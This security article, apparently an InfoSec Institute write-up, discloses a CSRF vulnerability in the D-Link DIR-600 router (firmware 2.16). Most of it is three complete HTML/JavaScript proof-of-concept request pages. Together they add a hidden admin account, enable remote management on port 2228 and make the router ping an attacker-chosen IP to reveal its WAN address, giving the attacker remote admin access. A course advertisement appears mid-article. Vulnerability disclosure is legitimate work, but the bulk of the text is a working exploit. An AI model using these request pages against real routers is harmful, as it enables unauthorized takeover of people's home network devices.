1. Introduction

The intention of this article is to show how dangerous a cross-site request forgery (CSRF) vulnerability can be. It will be presented for the D-Link DIR-600 router (Hardware Version: Bx; Firmware Version: 2.16, which was the latest version at the moment of writing this article).

The CSRF vulnerability is a known issue for D-Link routers (just enter D-Link CSRF in Google). I decided to take a look at this problem and finally present how the CSRF vulnerability in three places of admin panel can be used to get unauthorized remote admin access to this device.

2. CSRF and Attack Description

Let’s briefly describe CSRF first. This vulnerability allows the attacker to forge a request of the logged-in user. As a consequence, the user does what the attacker wants to be done. It is possible, when there is no CSRF token in the request or the authorization password is not required, to perform an action. From the perspective of the receiver, everything is fine (valid authentication cookie of the user).

Due to CSRF vulnerabilities in the admin panel of the aforementioned router the attacker can:

1. add a new admin account (R/W access)

2. enable remote management of the router

3. send a ping to a machine controlled by the attacker (this way the attacker learns WAN IP of the router).

At this point, the attacker can just log in to the router. Let’s analyze the proof of concept composed of Part I and Part II (with comments).

3. Part I: Adding New Admin Account and Enabling Remote Management

Two requests are needed (REQUEST1 first, REQUEST2 second)

REQUEST1:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");
  	xhr.withCredentials = "true";
        var body = "<?xml version="1.0" encoding="UTF-8" ?>"+
"<postxml>"+
  "<module>"+
    "<service>DEVICE.ACCOUNT</service>"+
    "<device>"+
      "<account>"+
        "<seqno/>"+
        "<max>1</max>"+
        "<count>2</count>"+
        "<entry>"+
          "<name>admin</name>"+
          "<password>==OoXxGgYy==</password>"+
          "<group>0</group>"+
          "<description/>"+
        "</entry>"+
        "<entry>"+
          "<name>admin2</name>"+
          "<password>pass2</password>"+
          "<group>0</group>"+
          "<description/>"+
        "</entry>"+
      "</account>"+
      "<session>"+
        "<captcha>0</captcha>"+
        "<dummy/>"+
        "<timeout>180</timeout>"+
        "<maxsession>128</maxsession>"+
        "<maxauthorized>16</maxauthorized>"+
      "</session>"+
    "</device>"+
  "</module>"+
  "<module>"+
    "<service>HTTP.WAN-1</service>"+
    "<inf>"+
      "<web>2228</web>"+
      "<weballow>"+
        "<hostv4ip/>"+
      "</weballow>"+
    "</inf>"+
  "</module>"+
  "<module>"+
    "<service>HTTP.WAN-2</service>"+
    "<inf>"+
      "<web>2228</web>"+
      "<weballow>"+
        "<hostv4ip/>"+
      "</weballow>"+
    "</inf>"+
  "</module>"+
"</postxml>";
        xhr.send(body);
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request1" onclick="submitRequest();" />
    </form>
  </body>
</html>

REQUEST2:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.0.1/pigwidgeon.cgi", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  	xhr.withCredentials = "true";
        var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";
        xhr.send(body);
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request2" onclick="submitRequest();" />
    </form>
  </body>
</html>

Comments for REQUEST1 and REQUEST2: LAN IP is 192.168.0.1 on default. Name of the admin is admin on default and can’t be changed in the GUI. The password of the admin is not changed when ==OoXxGgYy== is sent in the request. That’s why the request doesn’t change the password of admin and adds a new admin account (admin2, pass2) with R/W access. Remote management was enabled (port 2228).

Now the attacker needs to know the WAN IP of the router (described in Part II).

4. Part II: Sending Ping to Machine Controlled by the Attacker

One request is needed.

REQUEST3:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.0.1/diagnostic.php", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  	xhr.withCredentials = "true";
        var body = "act=ping&dst=X.Y.Z.W";
        xhr.send(body);
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request3" onclick="submitRequest();" />
    </form>
  </body>
</html>

Comment: Please change X.Y.Z.W to the IP to which you want to send the ping.

At this point the attacker can just log in to the router.

Want to learn more?? The InfoSec Institute Ethical Hacking course goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises. While these hacking skills can be used for malicious purposes, this class teaches you how to use the same hacking techniques to perform a white-hat, ethical hack, on your organization. You leave with the ability to quantitatively assess and measure threats to information assets; and discover where your organization is most vulnerable to black hat hackers. Some features of this course include:

  • Dual Certification - CEH and CPT
  • 5 days of Intensive Hands-On Labs
  • Expert Instruction
  • CTF exercises in the evening
  • Most up-to-date proprietary courseware available

5. Summary

It was show how severe consequences can happen as a result of the CSRF vulnerability. Due to CSRF vulnerabilities in the admin panel of the D-Link DIR-600 router (Hardware Version: Bx; Firmware Version: 2.16, the latest version at the moment of writing this article) the attacker can get unauthorized remote admin access to the device (three requests are needed to make it happen).